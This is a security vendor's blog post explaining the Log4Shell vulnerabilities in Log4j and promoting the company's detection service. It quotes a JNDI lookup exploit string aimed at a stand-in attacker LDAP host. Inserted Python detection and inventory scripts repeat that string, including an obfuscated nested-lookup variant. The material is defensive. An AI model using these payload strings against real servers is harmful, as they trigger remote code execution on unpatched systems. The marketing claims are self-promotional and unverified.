Published in CyCraft

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

  • The vulnerability CVE-2021-44228, also known as Log4Shell, was announced on December 10, 2021, and was rated 10 (out of 10) on the Common Vulnerability Scoring System (CVSS), a rating reserved for only the most severe vulnerabilities.
  • Following the announcement of CVE-2021-44228, CyCraft issued an emergency advisory to all CyCraft Customers outlining mitigation best practices. This advisory was updated as additional related vulnerabilities came to light.
  • Within hours, multiple attempts to exploit the vulnerability were observed in the wild by CyCraft and the wider intelligence community.
  • CyCraft leverages autonomous behavioral detection systems and human-AI collaboration to protect our customers.
  • CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested.
  • CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.
  • Organizations using Log4j2 are strongly encouraged to update the library to the latest Log4j2 version, currently version 2.17.0 at the time of this writing. Please see below for further mitigation best practices.

CyCraft Customers can rest assured that CyCraft products are not affected by this vulnerability. All systems within the CyCraft Community have been thoroughly checked and tested. Our CyCraft MDR customers can monitor their internal network attack activities generated by attackers exploiting vulnerabilities as well as seek assistance from our AI analysts in inventorying which endpoints (Windows, Linux) or programs are at risk and assessing potential damage. CyCraft will continue to track and monitor the evolution of Log4Shell, developing and deploying the necessary countermeasures to keep the CyCraft Community secure.

Suggested Patches and Updates

Log4Shell Vulnerability Impact

Within days of the disclosure, attackers had performed countless scans hunting for vulnerable systems and servers around the globe. The affected component is Log4j, a widely used Java logging and record-management framework developed and maintained by the Apache Software Foundation. Because Log4j is embedded in numerous commercial and open-source software products, the scope and extent of the impact are massive.

“[Log4Shell] is the largest and most critical single vulnerability in the past decade, [and may even be] the largest vulnerability in the history of modern computers.”
Amit Yoran, CEO of the network security company Tenable

Scans observed and contained by CyCraft AIR.

Vulnerability CVE-2021-44228

CVE-2021-44228 can be exploited remotely by unauthenticated attackers to execute arbitrary code (remote code execution, or RCE). For example, an attacker could send a message containing a Java Naming and Directory Interface (JNDI) lookup string, such as ${jndi:ldap://roguedapserver.com/a}; when the string is logged, Log4j resolves the lookup, allowing the attacker to execute malicious code on the host server. An attacker could likewise get the string logged through other, more subtle means, such as placing it in the User-Agent header while visiting a web page or app, to achieve the same result. Even websites and apps that do not directly accept user input can be vulnerable to Log4Shell attacks, since the string only has to reach a log statement.

When the target server logs this string, Log4j performs the JNDI lookup and connects to the attacker-controlled LDAP server named in it. That server can answer with a reference to a remote Java class, which the vulnerable server then loads and executes, giving the attacker direct control of the system.
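As an added illustration of the detection side of the passage above (not code from the original post or from CyCraft AIR), this Python snippet flags log lines that carry a JNDI lookup string, including nested lookups such as ${lower:j} that hide the literal "jndi". The sample access-log lines are constructed; only the roguedapserver.com lookup comes from the text.

```python
import re

# Log4j lookups can nest: ${lower:j} resolves to "j" and ${x:-j} yields the
# default value "j", so a naive search for the literal "jndi:" misses variants.
_CASE = re.compile(r"\$\{(?:lower|upper):([^}$]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^}$]*?:-([^}$]*)\}")
_JNDI = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nis|nds)\s*:", re.IGNORECASE
)


def normalize_lookups(text: str) -> str:
    """Collapse the nesting forms above, innermost first, until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE.sub(lambda m: m.group(1), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def find_jndi_lookups(line: str) -> list[str]:
    """Return the lower-cased JNDI protocols found in a line after normalization."""
    return [m.group(1).lower() for m in _JNDI.finditer(normalize_lookups(line))]


def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Return (line number, protocols) for every line carrying a JNDI lookup."""
    hits = []
    for no, line in enumerate(lines, start=1):
        protos = find_jndi_lookups(line)
        if protos:
            hits.append((no, protos))
    return hits


# Constructed sample access-log lines (not real traffic); line 2 is the page's
# example string, line 3 the same lookup written with nested lookups.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://roguedapserver.com/a}"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${::-l}dap://roguedapserver.com/b}"',
]

if __name__ == "__main__":
    for no, protos in scan_log(SAMPLE_LOG):
        print(f"line {no}: JNDI lookup via {', '.join(protos)}")
```

The normalization covers only the lower/upper and default-value forms; a production rule set would also handle the other Log4j lookup types and URL-encoded input.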

Vulnerability CVE-2021-45046

After a busy week of updates, Log4j had been upgraded to version 2.15.0. Although it patched CVE-2021-44228, industry intelligence reports revealed that the 2.15.0 patch could be bypassed* in certain non-default configurations where JNDI lookup is turned on. The CVSS rating of CVE-2021-45046 was therefore raised from 3.7 to 9.0, reclassifying it from a DoS vulnerability to RCE.

* This bypass uses an SSRF bypass technique introduced in a Black Hat talk.

Vulnerability CVE-2021-45105

A separate DoS issue was then found in Log4j 2.16 (CVE-2021-45105). Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3) did not protect against uncontrolled recursion from self-referential lookups, allowing an attacker with control over Thread Context Map data to cause a denial of service. This issue was fixed in Log4j 2.17.0 and 2.12.3.

How CyCraft Protects Customers From Attacks Exploiting the Log4Shell Vulnerability

CyCraft AIR hunts for malicious behavior and the known tactics and techniques of active and emerging threats rather than relying on block/allow signature lists or signatures for specific exploits. CyCraft AIR uniquely provides 24/7/365 coverage across your entire network via autonomous systems and human-AI collaboration.

CyCraft AI analysts leverage machine learning to detect, validate, and contain both known and unknown malware and threats. The CyCraft AIR sensor scans endpoints within your local network and in the cloud across Windows, Linux, and macOS environments. In addition to having already successfully detected and prevented attacks exploiting the Log4j2 vulnerability, CyCraft AIR has also proven to be highly effective in protecting both large and small organizations against advanced ransomware, cryptomining malware, Trojans, and botnets.

Above, CyCraft AIR successfully detected, validated, and contained malicious activity exploiting the Log4Shell vulnerability, preventing further malicious activity on both the targeted endpoint and the wider system. With each successful detection, validation, and containment, CyCraft AIR enhances its existing detection and response capabilities, providing the CyCraft Community at large with more effective and efficient coverage.

Inventorying Log4j

Most asset inventory systems do not support JAR analysis, so it is difficult to inventory Log4j versions on a large scale.

JAR inventory is extremely difficult for current IT teams because traditional software inventory tools enumerate components installed through MSI packages or system package managers. JAR files, however, are Java application-level packages rather than formally registered system components, so asset software cannot analyze them. To support a software bill of materials (SBOM), CyCraft MDR can analyze the Java processes running on a system, helping customers accurately inventory internal Log4j versions and more accurately calculate the potential impact.
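As an added example (not CyCraft's own tooling), the following Python script performs the JAR-level inventory the paragraph describes: it reads log4j-core's Maven pom.properties inside an archive, recurses into JARs nested in WARs or shaded JARs, records whether JndiLookup.class is present, and flags versions below the 2.17.0 recommended above (2.12.3 excepted, as stated in the text). The WAR it inspects is constructed in memory as a stand-in for a real deployment.

```python
import io
import re
import zipfile

# 2.17.0 is the version recommended above; 2.12.3 is the fixed 2.12-branch release.
FIXED = {(2, 17, 0), (2, 12, 3)}
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVES = (".jar", ".war", ".ear")

def parse_version(props: str):
    """Extract (major, minor, patch) from a Maven pom.properties file."""
    m = re.search(r"^version=(\d+)\.(\d+)\.(\d+)", props, re.MULTILINE)
    return tuple(int(x) for x in m.groups()) if m else None

def needs_update(ver) -> bool:
    """Unknown versions are treated as needing review, like anything below 2.17.0."""
    return ver is None or (ver < (2, 17, 0) and ver not in FIXED)

def inspect_archive(data: bytes, name: str, findings: list) -> list:
    """Record log4j-core version and JndiLookup presence; recurse into nested archives."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        if POM_PROPS in names:
            ver = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
            findings.append({"archive": name, "version": ver,
                             "jndi_lookup_present": JNDI_CLASS in names,
                             "needs_update": needs_update(ver)})
        for inner in sorted(names):  # WAR WEB-INF/lib and uber JARs nest archives
            if inner.lower().endswith(ARCHIVES):
                inspect_archive(zf.read(inner), f"{name}!{inner}", findings)
    return findings

def build_sample_war(version: str, with_jndi: bool = True) -> bytes:
    """Constructed WAR wrapping a stand-in log4j-core JAR (demo input, not a real artifact)."""
    jar, war = io.BytesIO(), io.BytesIO()
    with zipfile.ZipFile(jar, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if with_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder class bytes
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", jar.getvalue())
    return war.getvalue()

if __name__ == "__main__":
    for finding in inspect_archive(build_sample_war("2.14.1"), "app.war", []):
        print(finding)
```

On a real host, feed inspect_archive the JARs found on each running Java process's classpath; an old version with JndiLookup.class removed still shows up, so both fields should be reviewed together.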

CyCraft Customers can prevent cyber intrusions from escalating into business-altering incidents. From endpoint to network, from investigation to blocking, from in-house to cloud, CyCraft AIR covers all aspects required to provide small, medium, and large organizations with the proactive, intelligent, and adaptable security solutions needed to defend from all manner of both existing and emerging security threats with real-time protection and visibility across the organization.

Whether it’s on Windows, Linux, or macOS, CyCraft AIR leverages autonomous behavioral detection systems and human-AI collaboration to protect the CyCraft Community from both known active threats and unknown emerging threats.

Meet your cyber defense needs in the 2020s by engaging with CyCraft at engage@cycraft.com

CyCraft secures government agencies, police and defense organizations, Fortune Global 500 firms, top banks and financial institutions, critical infrastructure, airlines, telecommunications, hi-tech firms, SMEs, and more by being Fast / Accurate / Simple / Thorough.

CyCraft powers SOCs using innovative AI-driven technology to automate information security protection with built-in advanced managed detection and response (MDR), global cyber threat intelligence (CTI), smart threat intelligence gateway (TIG) and network detection and response (NDR), security operations center (SOC) operations software, auto-generated incident response (IR) reports, enterprise-wide Health Check (Compromise Assessment, CA), and Secure From Home services. Everything Starts From Security.


Additional Resources

  • Learn more about cybersecurity in our CyCraft Classroom Series. Our latest article, “What is Managed Detection and Response (MDR)?” teaches the benefits of MDR, its unique selling points, and how to make better-informed decisions when choosing an MDR service or vendor.
  • Out of the 47 Representative AI Startups listed in Gartner’s AI Market Guide, 7 are based in Taiwan, and 5 are based in Hong Kong. But only 1 of the 47 Representative AI Startups focused on cybersecurity products and services — CyCraft.
  • Read our latest white paper to learn what threat actors target Taiwan, their motivations & how Taiwan organizations retain resilience against some of the most sophisticated and aggressive cyber attacks in the world.
  • Is your SOC prepared for the next decade of cyber attacks? Read our latest report on building effective SOCs in the 2020s, the challenges to overcome, and the stressors to avoid — includes research from Gartner, Inc. on why Midsize enterprises are embracing MDR providers.
  • New to the MITRE Engenuity ATT&CK Evaluations? START HERE for a fast, accurate, simple, thorough introductory guide to understanding the results.
  • Our CyCraft AIR security platform achieved a 96.15% Signal-to-Noise Ratio with zero configuration changes and zero delayed detections straight out of the box.

CyCraft Technology Corp

CyCraft automates SOC ops for the Fortune Global 500, national govs, & SMEs with MDR, IR, & threat hunting solutions. Learn more at CyCraft.com
